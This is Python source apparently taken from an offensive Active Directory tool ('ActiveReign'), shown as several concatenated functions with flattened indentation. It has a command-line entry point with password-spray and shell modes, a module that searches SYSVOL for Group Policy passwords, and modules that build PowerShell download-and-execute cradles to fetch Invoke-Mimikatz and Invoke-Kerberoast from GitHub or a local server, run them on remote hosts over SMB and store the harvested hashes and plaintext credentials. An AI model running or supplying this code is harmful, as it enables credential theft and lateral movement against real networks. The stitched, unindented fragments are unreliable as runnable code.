def main():
main_parser = argparse.ArgumentParser(description=banner(), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)
main_parser._optionals.title = 'Optional Arguments\n\033[1;30m>>-------------------->\033[1;m'
main_parser.add_argument('-D', '--debug', dest="debug", action='store_true', help='Show debug messages & failed login attempts')
main_parser.add_argument('-T', dest='max_threads', type=int, default=75, help='Max number of threads to use')
main_parser.add_argument('--host-max', dest='max_host_threads', type=int, default=20, help='Max threads per host')
main_parser.add_argument('-W', dest='workspace', type=str, default='', required=False, help='Manually set workspace, otherwise defaults to config file')
sub_parser = main_parser.add_subparsers(title=' \nOperational Modes\n\033[1;30m>>-------------------->\033[1;m', dest='mode')
db_args(sub_parser)
enum_args(sub_parser)
shell_args(sub_parser)
spray_args(sub_parser)
query_args(sub_parser)
args = main_parser.parse_args()
if len(argv) <= 2: main_parser.print_help();exit(1)
if args.debug:
log_level = logging.DEBUG
else:
log_level = logging.INFO
# Init console logger
loggers = {}
loggers['console'] = setup_logger(log_level, 'ar3')
# First checks & load config
first_run_check(loggers['console'])
config_obj = ConfigLoader()
if not args.workspace:
setattr(args, 'workspace', config_obj.WORKSPACE)
first_workspace_check(args.workspace, loggers['console'])
# Setup file logger
loggers[args.mode] = setup_file_logger(args.workspace, args.mode)
# Setup secondary loggers - use argv since arg_mods haven't been made yet
if '--spider' in argv:
loggers['spider'] = setup_file_logger(args.workspace, "spider")
if '--gen-relay-list' in argv:
loggers['relay_list'] = setup_file_logger(args.workspace, "relay_list")
# Setup DB
db_obj = Ar3db(args.workspace, loggers['console'], args.debug)
try:
# Start
args = eval("{}_arg_mods(args, db_obj, loggers)".format(args.mode))
if args.debug: print_args(args, loggers['console'])
ops = import_module("ar3.ops.{}".format(args.mode))
ops.main(args, config_obj, db_obj, loggers)
except KeyboardInterrupt:
print("\n[!] Key Event Detected, Closing...")
exit(0)
except Exception as e:
print("[!] ActiveReign Error: {}".format(str(e)))
def run(self, target, args, smb_con, loggers, config_obj):
# Define Target
self.count = 0
if self.args['DC']['Value']:
target = self.args['DC']['Value']
# Create custom spider config
temp_config = config_obj
temp_config.WHITELIST_EXT = ['xml']
temp_config.KEY_EXT = []
temp_config.KEY_WORDS = []
temp_config.REGEX = {"gpp_password": "******"}
# Override args
setattr(args, 'max_depth', 12)
setattr(args, 'spider', False)
# Create spider logger
loggers['spider'] = setup_file_logger(args.workspace, "spider")
# Start
loggers['console'].info([
smb_con.host, smb_con.ip, "GPP_PASSWORD",
"Searching \\\\{}\\SYSVOL\\".format(target)
])
spider(args, temp_config, loggers, smb_con.db, target, 'SYSVOL')
loggers['console'].info(
[smb_con.host, smb_con.ip,
self.name.upper(), "Module complete"])
def run(self, target, args, smb_con, loggers, config_obj):
logger = loggers['console']
timeout = args.timeout
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
try:
# Define Script Source
if args.fileless:
srv_addr = get_local_ip()
script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
setattr(args, 'timeout', timeout + 60)
else:
script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
setattr(args, 'timeout', timeout + 25)
logger.debug('Script source: {}'.format(script_location))
# Setup PS1 Script
cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
try:
# Execute
cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
# Display Output
if not results:
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned'])
return
elif args.debug:
for line in results.splitlines():
loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line])
# Parse results and send creds to db
db_updates = 0
for cred in self.parse_mimikatz(results):
if cred[0] == "hash":
smb_con.db.update_user(cred[2], '', cred[1], cred[3])
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1],cred[2],cred[3])])
db_updates += 1
elif cred[0] == "plaintext":
smb_con.db.update_user(cred[2], cred[3], cred[1], '')
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
db_updates += 1
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
# write results to file
file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp())
tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
tmp_logger.info(results)
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])
except Exception as e:
if str(e) == "list index out of range":
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)])
else:
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj):
logger = loggers['console']
timeout = args.timeout
loggers['console'].info([
smb_con.host, smb_con.ip,
self.name.upper(), 'Attempting Invoke-Kerberoast'
])
try:
# Define Script Source
if args.fileless:
srv_addr = get_local_ip()
script_location = 'http://{}/Invoke-Kerberoast.ps1'.format(
srv_addr)
setattr(args, 'timeout', timeout + 30)
else:
script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'
setattr(args, 'timeout', timeout + 15)
logger.debug('Script source: {}'.format(script_location))
# Setup PS1 Script
launcher = powershell.gen_ps_iex_cradle(script_location, '')
# Execute
cmd = powershell.create_ps_command(launcher,
loggers['console'],
force_ps32=args.force_ps32,
no_obfs=args.no_obfs,
server_os=smb_con.os)
x = code_execution(smb_con,
args,
target,
loggers,
config_obj,
cmd,
return_data=True)
# Display Output
for line in x.splitlines():
loggers['console'].success(
[smb_con.host, smb_con.ip,
self.name.upper(), line])
# write results to file
file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp())
tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
tmp_logger.info(x)
loggers['console'].info([
smb_con.host, smb_con.ip,
self.name.upper(), "Output saved to: {}".format(file_name)
])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
